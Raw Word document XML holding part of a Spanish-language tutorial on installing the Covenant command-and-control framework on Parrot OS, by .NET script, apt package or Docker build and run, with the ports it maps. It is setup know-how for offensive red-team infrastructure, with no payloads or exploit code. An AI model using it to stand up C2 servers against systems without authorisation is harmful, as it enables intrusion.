              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D6D9CC3" wp14:editId="315A0E7B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="73660"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="656669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1D8E8D7D" w14:textId="49F9EA2C" w:rsidR="002817AC" w:rsidRDefault="002817AC">
                            <w:r w:rsidRPr="002817AC">
                              <w:t>sudo chmod +x ./dotnet-install.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6D9CC3" id="_x0000_s1059" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2516940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&#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IZ0gsy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1D8E8D7D" w14:textId="49F9EA2C" w:rsidR="002817AC" w:rsidRDefault="002817AC">
                      <w:r w:rsidRPr="002817AC">
                        <w:t>sudo chmod +x ./dotnet-install.sh</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DA88D" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46537F6C" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E401C7" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C005F58" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D1FF08" w14:textId="5AE817F6" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y lo ejecutaremos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281767CB" w14:textId="38F9627E" w:rsidR="00B45370" w:rsidRDefault="00B45370" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DBBAE0" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270F3D1C" w14:textId="47935B32" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B1E6FFE" wp14:editId="575213A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="73660"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="799778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48321CB8" w14:textId="3D44751D" w:rsidR="00B45370" w:rsidRDefault="00B45370" w:rsidP="002817AC">
                            <w:r w:rsidRPr="00006181">
                              <w:t xml:space="preserve">./dotnet-install.sh --version </w:t>
                            </w:r>
                            <w:r>
                              <w:t>latest</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00006181">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0EA812C6" w14:textId="214AA895" w:rsidR="002817AC" w:rsidRPr="002817AC" w:rsidRDefault="00006181" w:rsidP="002817AC">
                            <w:r w:rsidRPr="00006181">
                              <w:t xml:space="preserve">./dotnet-install.sh --version </w:t>
                            </w:r>
                            <w:r>
                              <w:t>latest</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00006181">
                              <w:t xml:space="preserve"> --runtime aspnetc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E6FFE" id="_x0000_s1060" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2516961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48321CB8" w14:textId="3D44751D" w:rsidR="00B45370" w:rsidRDefault="00B45370" w:rsidP="002817AC">
                      <w:r w:rsidRPr="00006181">
                        <w:t xml:space="preserve">./dotnet-install.sh --version </w:t>
                      </w:r>
                      <w:r>
                        <w:t>latest</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00006181">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0EA812C6" w14:textId="214AA895" w:rsidR="002817AC" w:rsidRPr="002817AC" w:rsidRDefault="00006181" w:rsidP="002817AC">
                      <w:r w:rsidRPr="00006181">
                        <w:t xml:space="preserve">./dotnet-install.sh --version </w:t>
                      </w:r>
                      <w:r>
                        <w:t>latest</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00006181">
                        <w:t xml:space="preserve"> --runtime aspnetcore</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE818C7" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372D26B8" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6567E481" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9CF909" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AAE6B7F" w14:textId="77777777" w:rsidR="002817AC" w:rsidRDefault="002817AC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C992445" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41831560" w14:textId="621640AF" w:rsidR="007B3349" w:rsidRDefault="006F5526" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora haremos un git clone del repositorio de </w:t>
      </w:r>
      <w:r w:rsidR="007060C7">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>ovenant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA0275" w14:textId="77777777" w:rsidR="006F5526" w:rsidRDefault="006F5526" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C804BB4" w14:textId="4E36166F" w:rsidR="006F5526" w:rsidRDefault="006F5526" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C0788A1" wp14:editId="64B12718">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="67945"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="372234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7F508A05" w14:textId="742BBCC4" w:rsidR="00D941BA" w:rsidRDefault="006F5526">
                            <w:r w:rsidRPr="006F5526">
                              <w:t xml:space="preserve">git clone </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId260" w:history="1">
                              <w:r w:rsidR="00D941BA" w:rsidRPr="00143090">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                </w:rPr>
                                <w:t>https://github.com/cobbr/Covenant</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0788A1" id="_x0000_s1061" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2516981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7F508A05" w14:textId="742BBCC4" w:rsidR="00D941BA" w:rsidRDefault="006F5526">
                      <w:r w:rsidRPr="006F5526">
                        <w:t xml:space="preserve">git clone </w:t>
                      </w:r>
                      <w:hyperlink r:id="rId261" w:history="1">
                        <w:r w:rsidR="00D941BA" w:rsidRPr="00143090">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                          </w:rPr>
                          <w:t>https://github.com/cobbr/Covenant</w:t>
                        </w:r>
                      </w:hyperlink>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8B4482" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB92CD2" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C909D1B" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53014796" w14:textId="77777777" w:rsidR="006F5526" w:rsidRDefault="006F5526" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9648C2" w14:textId="77777777" w:rsidR="006F5526" w:rsidRDefault="006F5526" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703BB7B1" w14:textId="4D403FD6" w:rsidR="00D941BA" w:rsidRDefault="00D941BA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34DDD6F9" wp14:editId="7C0D0025">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1001182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2338" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId262"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E5A824C" w14:textId="77777777" w:rsidR="00D941BA" w:rsidRDefault="00D941BA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595CBF90" w14:textId="7A53C793" w:rsidR="007B3349" w:rsidRDefault="00824A0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O podemos ejecutar este comando </w:t>
      </w:r>
      <w:r w:rsidR="007060C7">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instalarlo, siendo todo mucho más fácil:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548C59D" w14:textId="77777777" w:rsidR="00824A0C" w:rsidRDefault="00824A0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0867A4" w14:textId="0AE88CDB" w:rsidR="00824A0C" w:rsidRDefault="00824A0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16705D11" wp14:editId="2308C554">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="73660"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="18294939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137CD247" w14:textId="0954AD94" w:rsidR="00824A0C" w:rsidRDefault="007060C7">
                            <w:r>
                              <w:t>s</w:t>
                            </w:r>
                            <w:r w:rsidR="00824A0C">
                              <w:t>udo apt install covenant-kb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705D11" id="_x0000_s1062" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:25170022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&#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J4QtFW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137CD247" w14:textId="0954AD94" w:rsidR="00824A0C" w:rsidRDefault="007060C7">
                      <w:r>
                        <w:t>s</w:t>
                      </w:r>
                      <w:r w:rsidR="00824A0C">
                        <w:t>udo apt install covenant-kbx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B216E8E" w14:textId="5FA49116" w:rsidR="00824A0C" w:rsidRDefault="00824A0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475EEC75" wp14:editId="067A6D5C">
            <wp:extent cx="5400040" cy="3889375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17829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614" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId263">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3889375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DD3EE8" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="504AE303" w14:textId="210BCC28" w:rsidR="007B3349" w:rsidRDefault="00F71963" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para ejecutarlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EBD454" w14:textId="77777777" w:rsidR="00F71963" w:rsidRDefault="00F71963" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E583ED" w14:textId="2A57ECBF" w:rsidR="00F71963" w:rsidRDefault="00F71963" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A223681" wp14:editId="0051737C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="73660"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="648905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0702EFD8" w14:textId="35F9E441" w:rsidR="00F71963" w:rsidRDefault="00F71963">
                            <w:r w:rsidRPr="00F71963">
                              <w:t>covenant-kbx st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223681" id="_x0000_s1063" type="#_x0000_t202" style="position:absolute;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&#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Eyn2qO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0702EFD8" w14:textId="35F9E441" w:rsidR="00F71963" w:rsidRDefault="00F71963">
                      <w:r w:rsidRPr="00F71963">
                        <w:t>covenant-kbx start</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF0752" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422BFD01" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E5CF351" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480B64BC" w14:textId="7A0A0E49" w:rsidR="00F71963" w:rsidRDefault="00F71963" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para acceder </w:t>
      </w:r>
      <w:r w:rsidR="00F725BF">
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entraremos en la url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4FE2C2" w14:textId="77777777" w:rsidR="00F71963" w:rsidRDefault="00F71963" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F9CE18" w14:textId="2A634301" w:rsidR="00F71963" w:rsidRDefault="00F71963" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D0E3C61" wp14:editId="3E511FBE">
            <wp:extent cx="5400040" cy="4888230"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="139841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14883" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId264">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="4888230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E939187" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FADA874" w14:textId="3A79CAB4" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En mi caso esta opción me da problemas porque tengo más programas instalados en la máquina e interfieren con Covenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69454543" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B5932C" w14:textId="2B2E1A20" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En mi caso uso la instalación por Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF1FE7" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCFF9E2" w14:textId="3F5B8D14" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Descargaremos el repositorio de Covenant en Git de esta manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229B2AD0" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3D1DFF" w14:textId="34E5DF72" w:rsidR="00F725BF" w:rsidRPr="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00F725BF">
        <w:t xml:space="preserve">git clone --recurse-submodules </w:t>
      </w:r>
      <w:hyperlink r:id="rId265" w:history="1">
        <w:r w:rsidRPr="00F725BF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/cobbr/Covenant</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05D60D0D" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="1F2328"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FE617F" w14:textId="3DE5FB35" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Nos moveremos al directorio con cd ./Covenant/Covenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A11EB" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CEC3E7F" w14:textId="52826E94" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y haremos un ‘docker build -t covenant .’ para crear la imagen de Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D365FA" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E65EE3" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D028E3F" w14:textId="2A454D1F" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ahora crearemos el contenedor con el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0174AD" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D617AC" w14:textId="0B55F577" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BB67B3E" wp14:editId="22A2EF63">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1063815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3109B759" w14:textId="138E847C" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                            <w:r w:rsidRPr="00F725BF">
                              <w:t>$ ~/Covenant/Covenant &gt; docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v &lt;/absolute/path/to/Covenant/Covenant/Data&gt;:/app/Data covenant</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2803784D" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF"/>
                          <w:p w14:paraId="09735F5E" w14:textId="045DB2BD" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                            <w:r>
                              <w:t>Habría que cambiar &lt;/absoluete/path/to/Coveneant/Data&gt; por nuestra ruta a esa carpeta, que en mi caso será:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7850BAF4" w14:textId="580665A4" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                            <w:r w:rsidRPr="00F725BF">
                              <w:t>/home/parrot/Programas/Covenant/Covenant/Data:/app/Data</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="32DFCE2F" w14:textId="28763CE4" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                            <w:r>
                              <w:t>Con esto ya se iniciará.</w:t>
                            </w:r>
                          </w:p>
